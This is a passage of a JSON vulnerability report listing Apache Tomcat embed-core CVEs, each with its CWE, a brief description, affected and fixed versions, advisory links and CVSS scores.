List","url":"https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7%40%3Ccommits.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7@%3Ccommits.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca%40%3Cbugs.httpd.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca@%3Cbugs.httpd.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3@%3Ccommits.tomee.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG"},{"summary":"Fedora Project Mailing 
List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1938"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1938"},{"summary":"Gentoo Advisory glsa-202003-43","url":"https://security.gentoo.org/glsa/202003-43"},{"summary":"NetApp Advisory ntap-20200226-0002","url":"https://security.netapp.com/advisory/ntap-20200226-0002"},{"summary":"Debian Advisory dsa-4673","url":"https://www.debian.org/security/2020/dsa-4673"},{"summary":"Debian Advisory dsa-4680","url":"https://www.debian.org/security/2020/dsa-4680"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory 
cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"]}],"title":"CVE-2020-1938/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-46589"]}],"cve":"CVE-2023-46589","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2023-11-28T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-46589"},{"system_name":"NetApp Advisory","text":"ntap-20231214-0009"}],"notes":[{"audience":"developers","category":"other","text":"Inconsistent Interpretation of HTTP Requests","title":"Additional CWE: 444"},{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Improper Input Validation vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Improper Input Validation vulnerability Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82, and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. 
A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue. ## Related CVE(s) BIT-tomcat-2023-46589, CVE-2023-46589"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.96"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.96"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/11/28/2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2024/01/msg00001.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46589"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46589"},{"summary":"NetApp Advisory ntap-20231214-0009","url":"https://security.netapp.com/advisory/ntap-20231214-0009"},{"summary":"Openwall Mailing 
List","url":"https://www.openwall.com/lists/oss-security/2023/11/28/2"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.96"]}],"title":"CVE-2023-46589/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-42795"]}],"cve":"CVE-2023-42795","cwe":{"id":"459","name":"Incomplete Cleanup"},"discovery_date":"2023-10-10T18:31:35","ids":[{"system_name":"CVE Record","text":"CVE-2023-42795"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp Advisory","text":"ntap-20231103-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Incomplete Cleanup vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Incomplete Cleanup vulnerability Incomplete Cleanup vulnerability in Apache Tomcat. 
When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue. ## Related CVE(s) BIT-tomcat-2023-42795, CVE-2023-42795"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/10/9"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/065jfyo583490r9j2v73nhpyxdob56lw"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-42795"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-42795"},{"summary":"NetApp Advisory ntap-20231103-0007","url":"https://security.netapp.com/advisory/ntap-20231103-0007"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory 
dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-42795/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-25122"]}],"cve":"CVE-2021-25122","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2021-06-16T17:45:29","ids":[{"system_name":"CVE Record","text":"CVE-2021-25122"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-4891"},{"system_name":"Gentoo Advisory","text":"glsa-202208-34"},{"system_name":"NetApp Advisory","text":"ntap-20210409-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 
to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request. ## Related CVE(s) BIT-tomcat-2021-25122, CVE-2021-25122"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.63"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.63"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/01/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd90bf36b1877e1310b87ecd14ed7bbb15da52b297efd9f0e7253a3b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0463f9a5cbc02a485404c4b990f0da452e5ac5c237808edba11c947@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E"},{"summary":"Debian Mailing 
List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25122"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25122"},{"summary":"Gentoo Advisory glsa-202208-34","url":"https://security.gentoo.org/glsa/202208-34"},{"summary":"NetApp Advisory ntap-20210409-0002","url":"https://security.netapp.com/advisory/ntap-20210409-0002"},{"summary":"Debian Advisory dsa-4891","url":"https://www.debian.org/security/2021/dsa-4891"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.63"]}],"title":"CVE-2021-25122/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-25329"]}],"cve":"CVE-2021-25329","cwe":{"id":"502","name":"Deserialization of Untrusted 
Data"},"discovery_date":"2021-03-19T20:11:13","ids":[{"system_name":"CVE Record","text":"CVE-2021-25329"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-4891"},{"system_name":"Gentoo Advisory","text":"glsa-202208-34"},{"system_name":"NetApp Advisory","text":"ntap-20210409-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Potential remote code execution in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Potential remote code execution in Apache Tomcat The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue. 
## Related CVE(s) BIT-tomcat-2021-25329, CVE-2021-25329"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.61"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/01/2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r11ce01e8a4c7269b88f88212f21830edf73558997ac7744f37769b77@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r732b2ca289dc02df2de820e8775559abd6c207f159e39f559547a085@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8a2ac0e476dbfc1e6440b09dcc782d444ad635d6da26f0284725a5dc@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb51ccd58b2152fc75125b2406fc93e04ca9d34e737263faa6ff0f41f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cusers.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25329"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25329"},{"summary":"Gentoo Advisory glsa-202208-34","url":"https://security.gentoo.org/glsa/202208-34"},{"summary":"NetApp Advisory ntap-20210409-0002","url":"https://security.netapp.com/advisory/ntap-20210409-0002"},{"summary":"Debian Advisory dsa-4891","url":"https://www.debian.org/security/2021/dsa-4891"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.0,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.0,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.0,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61"]}],"title":"CVE-2021-25329/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/de
tail/CVE-2022-42252"]}],"cve":"CVE-2022-42252","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-11-01T12:00:30","ids":[{"system_name":"CVE Record","text":"CVE-2022-42252"},{"system_name":"Gentoo Advisory","text":"glsa-202305-37"}],"notes":[{"audience":"developers","category":"other","text":"Inconsistent Interpretation of HTTP Requests","title":"Additional CWE: 444"},{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat may reject request containing invalid Content-Length header"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat may reject request containing invalid Content-Length header If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header. 
## Related CVE(s) BIT-tomcat-2022-42252, CVE-2022-42252"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.83"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.83"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/zzcxzvqfdqn515zfs3dxb7n8gty589sq"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42252"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42252"},{"summary":"Gentoo Advisory glsa-202305-37","url":"https://security.gentoo.org/glsa/202305-37"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.83"]}],"title":"CVE-2022-42252/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-41080"]}],"cve":"CVE-2023-41080","cwe":{"id":"601","name":"URL Redirection to Untrusted Site"},"discovery_date":"2023-08-25T21:30:48","ids":[{"system_name":"CVE Record","text":"CVE-2023-41080"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp 
Advisory","text":"ntap-20230921-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Open Redirect vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Open Redirect vulnerability URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92. The vulnerability is limited to the ROOT (default) web application. ## Related CVE(s) BIT-tomcat-2023-41080, CVE-2023-41080"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.93"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.93"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/71wvwprtx2j2m54fovq9zr7gbm2wow2f"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-41080"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-41080"},{"summary":"NetApp Advisory ntap-20230921-0006","url":"https://security.netapp.com/advisory/ntap-20230921-0006"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory 
dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.1,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":6.1,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":6.1,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.93"]}],"title":"CVE-2023-41080/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1935"]}],"cve":"CVE-2020-1935","cwe":{"id":"444","name":"Inconsistent Interpretation of HTTP Requests"},"discovery_date":"2020-02-28T01:10:48","ids":[{"system_name":"CVE Record","text":"CVE-2020-1935"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Debian Advisory","text":"dsa-4673"},{"system_name":"Debian Advisory","text":"dsa-4680"},{"system_name":"NetApp Advisory","text":"ntap-20200327-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Potential HTTP request smuggling in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Potential HTTP request smuggling in Apache Tomcat In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed 
some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely. ## Related CVE(s) BIT-tomcat-2020-1935, CVE-2020-1935"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.51"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r127f76181aceffea2bd4711b03c595d0f115f63e020348fe925a916c%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r441c1f30a252bf14b07396286f6abd8089ce4240e91323211f1a2d75@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r660cd379afe346f10d72c0eaa8459ccc95d83aff181671b7e9076919@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7bc994c965a34876bd94d5ff15b4e1e30b6220a15eb9b47c81915b78@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing 